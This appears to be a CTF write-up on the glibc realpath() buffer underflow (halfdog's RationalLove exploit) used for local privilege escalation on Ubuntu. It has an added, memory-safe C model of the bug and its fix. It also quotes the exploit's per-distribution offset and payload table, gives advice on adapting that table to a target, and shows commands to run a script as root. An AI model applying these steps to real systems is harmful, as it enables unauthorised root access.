Author: l3m0n

I recently ran into this privilege escalation vulnerability during a CTF. The environment was Ubuntu 17.10 (Artful Aardvark), and the escalation also had to be done from a non-interactive webshell on a box with no outbound internet access.

Vulnerability details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
The bug lives in glibc's realpath(), which trusts getcwd() to return an absolute path. When the working directory is not reachable from the process root, the kernel returns a path prefixed with "(unreachable)" instead of one starting with "/", and realpath's handling of ".." components then walks back past the start of its own buffer. The author turns this into a root shell through the SUID mount/umount binaries, which pass their argument through realpath(), so the exploit is tightly tied to the target's libc build.
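To make the underflow concrete, here is an added example that is my own code, not part of the original post, of RationalLove.c or of glibc. It models, in simplified form, how realpath() collapses ".." components of a relative path against the getcwd() result. resolve_vulnerable() keeps the shape of the glibc loop but stops and reports RP_UNDERFLOW at the exact point where the real loop would read before the start of its buffer; resolve_fixed() adds the check that the upstream fix amounts to in effect: a working directory that does not start with "/" is rejected with ENOENT. The cwd strings, including "(unreachable)/x", are constructed inputs; symlink resolution and the lstat() calls of the real function are omitted.

```c
/*
 * Added example, not part of the original post, RationalLove.c or glibc:
 * a simplified model of how glibc's realpath() collapses ".." components
 * of a relative path against the getcwd() result.  Symlink handling and
 * the lstat() calls of the real function are left out on purpose.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>

enum {
    RP_OK        =  0,
    RP_UNDERFLOW = -1,   /* the vulnerable loop would read before the buffer */
    RP_ENOENT    = -2,   /* cwd is not absolute: rejected by the fixed version */
    RP_TOOLONG   = -3
};

/*
 * Vulnerable shape.  glibc's ".." step is
 *     if (dest > rpath + 1) while ((--dest)[-1] != '/');
 * which only terminates because rpath[0] is assumed to be '/'.  A cwd the
 * kernel reports as "(unreachable)/..." starts with '(' instead, so the
 * scan runs off the front of the buffer.  To keep this demo memory-safe we
 * stop at the point where the real loop would read rpath[-1].
 */
static int resolve_vulnerable(const char *cwd, const char *rel,
                              char *out, size_t outlen)
{
    char rpath[256];
    size_t cwdlen = strlen(cwd);
    if (cwdlen == 0 || cwdlen >= sizeof rpath)
        return RP_TOOLONG;
    memcpy(rpath, cwd, cwdlen + 1);        /* realpath starts from getcwd() */
    char *dest = rpath + cwdlen;

    for (const char *p = rel; *p != '\0'; ) {
        while (*p == '/')                  /* skip separators */
            p++;
        const char *end = p;
        while (*end != '\0' && *end != '/')
            end++;
        size_t n = (size_t)(end - p);
        if (n == 0)
            break;                         /* trailing '/' */

        if (dest[-1] != '/')               /* separator before the component */
            *dest++ = '/';

        if (n == 1 && p[0] == '.') {
            /* "." leaves the path unchanged */
        } else if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (dest > rpath + 1) {
                do {
                    --dest;
                    if (dest == rpath)     /* next read would be rpath[-1] */
                        return RP_UNDERFLOW;
                } while (dest[-1] != '/');
            }
        } else {
            if ((size_t)(dest - rpath) + n + 1 >= sizeof rpath)
                return RP_TOOLONG;
            memcpy(dest, p, n);
            dest += n;
        }
        p = end;
    }
    if (dest > rpath + 1 && dest[-1] == '/')   /* drop trailing separator */
        --dest;
    *dest = '\0';
    if ((size_t)(dest - rpath) >= outlen)
        return RP_TOOLONG;
    memcpy(out, rpath, (size_t)(dest - rpath) + 1);
    return RP_OK;
}

/*
 * Hardened shape: refuse to work from a cwd that is not an absolute path,
 * which is what the upstream fix achieves (realpath fails with ENOENT).
 * Once rpath[0] == '/' is guaranteed, the ".." scan above cannot underflow.
 */
static int resolve_fixed(const char *cwd, const char *rel,
                         char *out, size_t outlen)
{
    if (cwd[0] != '/') {
        errno = ENOENT;
        return RP_ENOENT;
    }
    return resolve_vulnerable(cwd, rel, out, outlen);
}

int main(void)
{
    /* Constructed inputs: an ordinary cwd and one the kernel would report
       for a directory that is not reachable from the process root. */
    const char *cwds[] = { "/tmp/x", "(unreachable)/x" };
    const char *rel = "../x/../../";       /* same shape as the exploit path */
    char out[256];
    for (int i = 0; i < 2; i++) {
        int rc = resolve_vulnerable(cwds[i], rel, out, sizeof out);
        printf("vulnerable: cwd=%-16s -> %s\n", cwds[i],
               rc == RP_OK ? out : rc == RP_UNDERFLOW ? "BUFFER UNDERFLOW" : "error");
        rc = resolve_fixed(cwds[i], rel, out, sizeof out);
        printf("fixed:      cwd=%-16s -> %s\n", cwds[i],
               rc == RP_OK ? out : rc == RP_ENOENT ? "ENOENT" : "error");
    }
    return 0;
}
```

With "/tmp/x" the two ".." steps stop at the leading "/" and the result is "/"; with "(unreachable)/x" the same relative path drives the scan into the bytes before the buffer, which is exactly the condition the exploit then abuses inside the SUID binary.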
Looking at the exploit, you can see that it hardcodes a table of per-distribution data and only runs if the target matches one of the entries, so on other systems it simply does nothing:
https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
```c
// Four entries per OS: the quoted VERSION string from os-release, the
// exploit path, the libc symbol name, and libc-build-specific delta bytes.
static char* osSpecificExploitDataList[]={
    // Debian Stretch
    "\"9 (stretch)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "from_archive",
    // Delta for Debian Stretch "2.24-11+deb9u1"
    "\x06\0\0\0\x24\0\0\0\x3e\0\0\0\x7f\xb9\x08\x00\x4f\x86\x09\x00",
    // Ubuntu Xenial libc=2.23-0ubuntu9
    "\"16.04.3 LTS (Xenial Xerus)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "_nl_load_locale_from_archive",
    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
    // Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"
    "\"18.3 (Sylvia)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "_nl_load_locale_from_archive",
    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
    NULL
};
osReleaseExploitData=osSpecificExploitDataList;
if(osRelease) {
    // If an OS was detected, try to find it in list. Otherwise use
    // default.
    for(int tPos=0; osSpecificExploitDataList[tPos]; tPos+=4) {
        if(!strcmp(osSpecificExploitDataList[tPos], osRelease)) {
            osReleaseExploitData=osSpecificExploitDataList+tPos;
            break;
        }
    }
}
```
Read the target's VERSION string (the quoted value that the first field of each entry above is compared against) and edit the table to match it; the remaining fields must fit the target's libc build.

After the competition I reproduced this on an Alibaba Cloud Ubuntu 16.04.3 instance, and the privilege escalation succeeded.
As for the non-interactive case, it is enough to change the command the exploit runs as root so that it executes a prepared script instead of dropping into an interactive shell:

```sh
gcc -o exp love1.c -std=c99
./exp
# this will run /bin/bash /tmp/aaaaa.sh as root
```
know it then do it